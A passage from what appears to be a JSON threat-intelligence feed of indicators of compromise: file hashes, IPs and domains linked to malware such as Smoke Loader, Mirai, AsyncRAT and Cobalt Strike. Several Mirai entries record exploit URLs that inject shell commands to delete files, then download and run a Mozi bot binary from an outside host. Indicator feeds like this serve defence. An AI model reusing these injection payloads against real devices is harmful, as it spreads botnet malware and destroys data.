"2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273604069715, + "hash": [ + "469cde5e3b56a12d497c351d56b94cb4", + "75403f67807df66ace3f1bce1bcaf1814eaff939", + "9643f68b5bcc82efed6be3844c93f54437ffb7434dfc80d04165cb663f7d6fd1" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "d97d1e2a171246533a0f36f7d6337e0185d23e00", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273604073277, + "hash": [ + "37b1a8a83fe1963f5585dc49dc0acb38", + "5ae416c5123bf4a4d22eb0f2c91798d3e0f1528f", + "31beefcb8e8211a9825a1fd9a423b95e15fbf61fdeded63d2ce24448326a0d89" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "6dee09adf8c668321362a2b266cc165001e62de7", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273604076907, + "hash": [ + "962a7fcc07189cb9b758a2b6a5ab3e4d", + "1277453dd5f92c3941913bf4f0f223857409b57c", + "404d888f3cdda724db8d2a9683372c38cb4f96731c6cd7a8334511d4150c9602" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "224db5cb82cdfa02efa711e00e08275060f67a36", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273605623283, + "hash": [ + "badfab85449ac9f1586e8266770ddeb5", + "e8ae2d85515aaf1d002e3736c230412d01795c79", + "04df236e0d914d5ef690fa60016a3107653e90c3dd67271d7e3defbfecd88b1e" + ], + "malwareList": [ + { + "name": "Phorpiex", + "aliases": [ + "Trik", + "Wortrik", + "Phintok" + ] + } + ], + "threatList": null + }, + { + "id": "d159f479dfa95cbf2606095937d3f704d20b9457", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "url": "http://185.186.95.51/shell?cd+/tmp;rm+-rf+*;wget+http:/192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17273634718083, + "ip": [ + "185.186.95.51" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "e5e3fb7589195da782e4e82da87da5ca193ef48d", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273634718811, + "ip": [ + "112.94.96.92" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "5ff44ee97dad6714949b2a4f63ca2c144ff952d0", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273659674332, + "hash": [ + "05f5ab4efc8d855dc074df34fdd866a5", + "ebba660f3769823f9b22a8fa58cf666322e34fed", + "39a23c0fbaa450043d4c0fb59595cd63edb160f7715e64516808f06956334df4" + ], + "malwareList": [ + { + "name": "AsyncRAT", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "568daf549d655412c2de2cd1155c973c7fbb67b0", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "domain": "slopere.su", + "seqUpdate": 17273682697741, + "malwareList": null, + "threatList": [ + { + "name": "TA505", + "title": "TA505 - New indicators have been found" + } + ] + }, + { + "id": "d526d0be452ae6222e7682a2cf596e69ed99aba5", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273701715388, + "hash": [ + "225d44333aad40690bcec096808d5112", + "5a14203c64f3f7d018b75f099c74c0bd92691513", + "a6f730750e5b45d5a55faad8aabb950ef006ae0298a0c6ed62fc2b519f3220dd" + ], + "malwareList": [ + { + "name": "RMS", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "b7faf485e91ee6f29987f1e0813fea4b7ee1c964", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273702141437, + "hash": [ + "28e54d0543fe094541b5bee55924be59", + "20a24bb5efc45e81e65a7f8f09c7b1b7eb40d1b1", + "a3e4d8fbb80f2b03853df91b4d82df425bc7d89a16e2296a06c93bca416c786b" + ], + "malwareList": [ + { + "name": "AveMaria", + "aliases": [ + "Ave Maria", + "Ave_Maria", + "MortyStealer", + "WARZONE RAT" + ] + } + ], + "threatList": null + }, + { + "id": "1bbe379e9f42722176991bae22ac1cdf1f5f9d7a", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273707281899, + "ip": [ + "119.202.158.151" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "fe567837874cc0f9ecb569837e0676c980b2f34f", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273708992795, + "hash": [ + "0e46f4ee2809e9b76b248941e3905b7a", + "885b49691b6222c27b05b4a8c27cff2dbde02803", + "6b669304f2bc1d71fc402fb31e609a339d73a2480235626e79072f40a1913726" + ], + "malwareList": [ + { + "name": "HawkEye", + "aliases": [ + "HawkSpy" + ] + } + ], + "threatList": null + }, + { + "id": "ee3d91cb5280d788ddbd842a5096825cbd41024d", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273721270263, + "hash": [ + "93a7e55934ecc4b48b14d03b820a01fc", + "32268eb3279f4eecb5bde4a7d3f6fc97a4fa5b9e", + "3136bdf8bfebee8e96741c180b79b628f5200720ec0f28a380aeb4d100b259c9" + ], + "malwareList": [ + { + "name": "Cobalt Strike", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "7b9504601f34e0bc3aac871d977439e4b8af9796", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273751084494, + "hash": [ + "7a7c37c2afadabad47d97e9162539c2d", + "b0eb6816c3012cafb81f183369f0d1b67293ab53", + "03114f3ae91f8ef889386171d41a583442adb22aff8704699cd08000ab859fdf" + ], + "malwareList": [ + { + "name": "ZLoader", + "aliases": [ + "Terdot", + "Axe Bot" + ] + } + ], + "threatList": null + }, + { + "id": "8995823d2d6c34919517491fb5ebd56725782359", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "url": "http://91.241.87.28/shell?cd+/tmp;rm+-rf+*;wget+http:/103.203.72.254:56026/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17273879401403, + "ip": [ + "91.241.87.28" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "ed2bdd18fc6c0bcadeec7c971532a6cf68d646f3", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273879402076, + "ip": [ + "103.203.72.254" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "37fa409a43d926a3b8c30cbd978d08a1bfeadd07", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "url": "http://194.143.143.168/shell?cd+/tmp;rm+-rf+*;wget+http:/192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17273879404209, + "ip": [ + "194.143.143.168" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "cbe455aebe8c99151cf2298465d33a69d841943d", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273879405178, + "ip": [ + "121.206.155.103" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "fe76b71a44593c81eef6aca2dda15ac86910d767", + "type": "network", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "domain": "xmagua.com", + "seqUpdate": 17273898669374, + "malwareList": null, + "threatList": [ + { + "name": "MageCart", + "title": "MageCart - New indicators have been found" + } + ] + }, + { + "id": "93e94c554130c0bb72fedbc0d94fcfc7981bebdb", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17273963145716, + "hash": [ + "3d4315b68a9b86215ebec5555af2cae6", + "2b413445a55224fc5f999448fe60dec2d85cb792", + "3aefe4dceaaddcae9dfcb342d88f16c229d090ba13e7808957cbd103a0302331" + ], + "malwareList": [ + { + "name": "RMS", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "6838ea12080fd687d21892ae6ee9236c6dadecdc", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17273993512715, + "hash": [ + "52a93d34637da1028d3e55bfed46d968", + "33b6899cdc1ae0d0b581122c6b94115196e4836e", + "49df550c89322250e8524a0047e6e8cd0371ea7acf9c3b1645d6bd1a98c3ef32" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "48cb73be978aeb8c68102dba42620a98b8484522", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17273993516751, + "hash": [ + "c4fe1ccedd6423de4a1882f205a72771", + "a40259134139e45cc61151cf44ea57c7875c308f", + "512d6c134ff74aa2bc73fbf557cb7d7ddc5facfe0928cbc374220b22296af121" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "4117c2152ba5492b8e810a100a13a41d5c4b6141", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17273993520084, + "hash": [ + "c5c22e946dd9cf45a5d93f01f76af144", + "4759ac130123ce4ccd5fb14118888463067843a5", + "d9a9c2b3660cc1e116f34119e3aeb488e1221a25cc9bae9702f877a5860777d5" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "bd1254fd448e414b66fa9835d195759b68145e0b", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17273993523218, + "hash": [ + "f4e0b23dc97b5d0a3e3b42e4dbd93202", + "3a6c5db4838a9583e5e84102e77874d15ec08a01", + "47d23fb419cf516255fcffeb7608b122020c8b9ac8c6c8b439ec87c92547e993" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "3a0f7575d60fced3876a5ccac8c70aee39eaef67", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17273993755688, + "hash": [ + "8e1e7ad1f120e5d8aa2a9dfcf0159d3a", + "9cc1f2f5588dbda40466f0bdd8ec91bbb92018e9", + "0966adc457324cbfe70dbce729ef59c622bb78b9cbffdea1352954c5e28daff1" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "45429f65fb751f5a8906c738de3512a574715801", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17273993759079, + "hash": [ + "4e3b4f43f7186afd590834783e2d7479", + "d03e620898aaf06c268ececc4eb30bd97987b15f", + "c0edcdfa08896d04a364dd630e002b5940234377e5dc2a4e658a4a9ae2df5486" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "f22a3cf1a746a188a97e630cfe06230c673b55f0", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17273993762628, + "hash": [ + "914a47d6adecf897d16ee9308ed05617", + "087719b9f4c5f142647e1246a02380866a0fca91", + "dd1c8ddf23c2a51af4815dd149e86fd649110b188ca9ab1b8a0552a6391f95e9" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "752438f0a1568a29992181b831dd2b5848c7c3ee", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17273993765672, + "hash": [ + "0806d0093d3d242b2792c9abeae65cfc", + "269924e0965f4699aaa096922ae3da02b7513875", + "0ba685c02c726f1a681a8553dba4171288ef00ac00aea006f57ff4d38dc0309c" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "0601dccdd02539acbecfbd40bc7a46771e9aeda7", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274008751126, + "hash": [ + "934cada73c388a3458f1c095bca835f8", + "b455ff1ec506331da89cb81965717f026b33c8d6", + "5b44291f2e80924876f60ddb1903e7ebf9608f4ecdd0294bfaaaa10012996f37" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "a9e9bf6bfa7c25b2b498bd751b8c8b975c4f4c7e", + "type": "network", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-10-19T00:00:00+03:00", + "domain": "virtualtour.giorgiotesigroup.it", + "url": "https://virtualtour.giorgiotesigroup.it/loginGponForm/diag_Form?images/", + "seqUpdate": 17274023166361, + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "6d6a3377bbdac8893c0fef6ddfed6dedc5779e10", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274061741089, + "hash": [ + "78999d8fffb3e8ff2d45e381f9d87a83", + "33ea3b3931f6a4ac0b1e9ff0f22badabfe623272", + "ed641f90a7628758b0930d2fb397b9a43ae87035d46d87e46bbdc86dd91f50e8" + ], + "malwareList": [ + { + "name": "Astaroth", + "aliases": [ + "Guildma" + ] + } + ], + "threatList": null + }, + { + "id": "92212aeeb8a2a96ec9108c0fabeedbfaf7aed72f", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274122343435, + "hash": [ + "7ad6d40e8a6d724cf5c95530c22d5fd6", + "e14e725b9190cc02fd7c45862478a904a73f2da4", + "080cbec63a7bae053d1d0f01279de040c16fe2547721948fc2b430a16486d8e4" + ], + "malwareList": [ + { + "name": "FlawedAmmyy", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "47b903351bb9002258c766be0a0ec7e0e33a23e2", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274133648980, + "hash": [ + "be48feeb2c34c27683bdaec79681b6da", + "83c2ee9c521a42c84eed2b2d1ce1d582df560553", + "e0997b0ac8b9e32862c06c50a1d32fbee49eb8cb9beb28274505c3671a4505e8" + ], + "malwareList": [ + { + "name": "Loki PWS", + "aliases": [ + "Loki Bot", + "Primarypass", + "LokiBot" + ] + } + ], + "threatList": null + }, + { + "id": "e4c391246ee66435953ed732b182b88b9e8f2dfc", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274151161223, + "hash": [ + "3c6b6256b96f96d1fce5eb57f42e304d", + "64b8be6fa8bf1f773238afe54162f916327415b0", + "c09e663ee811c23168adc44a617bae342a197f517b82e3172d4749610414db13" + ], + "malwareList": [ + { + "name": "njRAT", + "aliases": [ + "Bladabindi", + "Ratenjay" + ] + } + ], + "threatList": null + }, + { + "id": "3bffce7380dc0dfca236a3cf0ade95b33ddb189e", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274151164129, + "hash": [ + "d8920bae87b16f748fd9e904271aa7f4", + "fcd752ddb5ff4c34c3e1514decb7e388c2ef67b2", + "f40e4633286e09e93d57798a17310a52964cd9817fbd3ad4f8b621afb9b524fa" + ], + "malwareList": [ + { + "name": "njRAT", + "aliases": [ + "Bladabindi", + "Ratenjay" + ] + } + ], + "threatList": null + }, + { + "id": "28bf29854acdc3486e29465aa2075023203923ee", + "type": "network", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-10-10T00:00:00+03:00", + "domain": "access.cloudportal.it", + "url": "https://access.cloudportal.it/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17274183734055, + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "e6158fca5ff29d3049680b78c19a6173766be14a", + "type": "network", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-10-10T00:00:00+03:00", + "url": "http://185.186.95.13/shell?cd+/tmp;rm+-rf+*;wget+http:/192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17274183734056, + "ip": [ + "185.186.95.13" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "ac3f12cd4d1491e9bb75a2fe6bfae9c0b944812a", + "type": "network", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274183735468, + "ip": [ + "120.85.94.79" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "856bfd8b12ae01e6614b11fbc28359ce8cb031fe", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274199337092, + "hash": [ + "d0881012a19f61a0a90dd0771a4dc13b", + "2ad5b2f0c8a4dd695cfc82ccc0f665c938ca8dfd", + "ac9526244b68d20206d7427e87bee3bfea36471b57e80c9e7d029413050bbebd" + ], + "malwareList": [ + { + "name": "HawkEye", + "aliases": [ + "HawkSpy" + ] + } + ], + "threatList": null + }, + { + "id": "b77bad72c59e7ee1056bbc13acc30233f07c343e", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274214017025, + "hash": [ + "f999ed4f994babcd90b213ea113fe365", + "393961cd933e39df381a51d2fe042d1361538631", + "908bec6e52c2e68cfb84945303a97ea39afc2adb295d3a020158ae0a3afe4dc0" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "122891e7e16933b477696577d35cad97baca9e79", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274245160239, + "hash": [ + "859f0d226967a59c62709c81728c99f3", + "57a8b9f5159e1578032f2a90db46dcbb9c5ed0e5", + "c3e9dc315af9a1d3d069192ded2e62cbff92146c53278375db8d46f9c6011bc5" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "86d0f36f47f870a806ecd78d433e50d65c208df4", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274253963815, + "hash": [ + "ea1a831b2a3dd0abc6c3f58e2e6205a3", + "6c99dfaf83fbb5ef2e5919f85ed2e4a8834297e8", + "5f8505f90cd7e0249decddf45ab028dca561d51a30af19bffce335df2774b5a6" + ], + "malwareList": [ + { + "name": "NetWire", + "aliases": [ + "NetWiredRC" + ] + } + ], + "threatList": null + }, + { + "id": "5d325ea308211d0571127796b79d9d5577d77af0", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274254232671, + "hash": [ + "bff93fe311476ba5c12ab32ff5d0bd79", + "57e3ec672c81f6c5d03d7a19745567de83a30ddf", + "62f716ee3a6f91afceb15d1ceebabcdaf64f8419c23455e16cc61e0046cbe71a" + ], + "malwareList": [ + { + "name": "Spora", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "d0dc5e78ac58ca44e77c6ec867cda062c636395e", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274257799330, + "hash": [ + "ada5381da7ba527d297cb1cada584374", + "7555cbd921be55399d9dbe73842786a3a297b818", + "838a7cb3c10957431e1d98e966a0ff4c56043a00d970150872d6fffb288d7c41" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "912c288c270b59ad9480f1123efaf706ac88fdd0", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274270017561, + "hash": [ + "412ccb2daeee89a4ecc7d28b86b9aada", + "05074de8d74d40700f790ffd19cc1722a8fa2755", + "d6ddcee7af045b9c4cf8198eb749b7820a4d4d75c3b7a8e93a41f5f713b24c6c" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "516b8ee6f45886cdb85249acdf62f1c01f54c057", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274270021452, + "hash": [ + "18b924fe6f78286cbe540c57b2bd898f", + "0977ec622e2d7cdbeb1e3e9bcade86c42e01ab3f", + "5db2c8add5a360b891d13c795f5315e654d0eeae76f18dc9a7e3deff159c61ba" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "1e8329c7a059790233a660cede5654242dbcd11c", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274270024405, + "hash": [ + "02c9f207fa4310989e87fa5564e5b6b8", + "323030b117bdc48c1901e95f831b920575060a0f", + "633115d046ebe495d865a782e834b2b1f071d21ef4da749f4a3245a5184eaec2" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "952bf6320769ee1353e40b32f48efce9d807891d", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274274659552, + "hash": [ + "b18d047e5365cd01e9b30775b50ed2d5", + "773e86e04678cbd7faf3a457d8f42ec18373b357", + "32973d7e38dd8b2901408a6800355b20bd24e87802488ed8a96eb180727c23ee" + ], + "malwareList": [ + { + "name": "Coinminer", + "aliases": [ + "BitCoinMiner", + "BitMiner" + ] + } + ], + "threatList": null + }, + { + "id": "86ecf843b1884ed624ce4e7e7af5c5d3628712d1", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274278126763, + "hash": [ + "25e7e9fd90efa22c75629aea75a49de3", + "90a0a7ceb4e615f140f4958791a95d1104d14198", + "58190c4af418d847f5cd805d8001d777c582dc4ea7c77e23bf7acc617e78a06f" + ], + "malwareList": [ + { + "name": "njRAT", + "aliases": [ + "Bladabindi", + "Ratenjay" + ] + } + ], + "threatList": null + }, + { + "id": "cda9987962e81d33e3f676ee10da9be3fa55f6f7", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274294331443, + "hash": [ + "7cb8192849049c09c5b2e4593b45a470", + "88f77bd5ce400f46939dbc09a65aeb961ddaeb08", + "d1142566663fd37b3da974985abbd208c1c38893f6b36e95313d10ab8f4e3966" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "603dfdc2479a80a72265ffc27aa915ec021f2d73", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274297317757, + "hash": [ + "03694a0c7f449eeefe76126c282b64d5", + "2a14e7963b94d57ff0fb75da705876b561bbd9c1", + "2d77958cfaf04ab43af620efc275335c3d5a065063467b1d3ba7be7e045d5465" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "560def2312e83e41597e5f5142135db32849d893", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274303087012, + "hash": [ + "b68886b529c79f23dc4feebbd6759410", + "440e54667e6bcc472f5138f281e2c64ab9876e8f", + "8c5d6dbca2c586cc534a602ae7ce2d025de8718f07cb9f46ae648b011259406b" + ], + "malwareList": [ + { + "name": "Gootkit", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "4e3806a0b1a842802233c17c54faaf205eda8ecd", + "type": "network", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274306130414, + "ip": [ + "185.174.135.68" + ], + "malwareList": null, + "threatList": [ + { + "name": "Bahamut", + "title": "Bahamut - New indicators have been found" + } + ] + }, + { + "id": "d16dfe72c8451d74143e68ee89932e8cac76b4e1", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274307490408, + "hash": [ + "eac19928fa57e346743ed26ca1d626d9", + "48d34f3fffdb44644eae5f54ea4225353d5e6529", + "94c84ab228ca377a6e19c18425fc2c367c0cb6efe349b724b351fcf0543fb0c1" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "677b5f02043285f02a5f1af1b2c204ace26d1bc1", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274307494224, + "hash": [ + "0492133038d9978434c60c2e119a0634", + "4ccf80bacdb0b0d9b54c55bffadc0a20dc701b79", + "a0225fb4feaeb71fd9b07e9dda07eaef4c858fd6bb38d8a222bc131861de6438" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "d5ad837d0e12bd40ab88ec594af557f913289ab5", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274307497961, + "hash": [ + "31fd311d1d9b79df2cfec50e413d3531", + "508e3bb76e7e8a6d8bbaa522bf63aee294fc64d8", + "e7b6d736338fc0680dd356102dfd4cefe3654160fb1ebfd2878d643c16c12979" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "bb83878c6489e8551bc3e68e678973a35ff4deed", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": 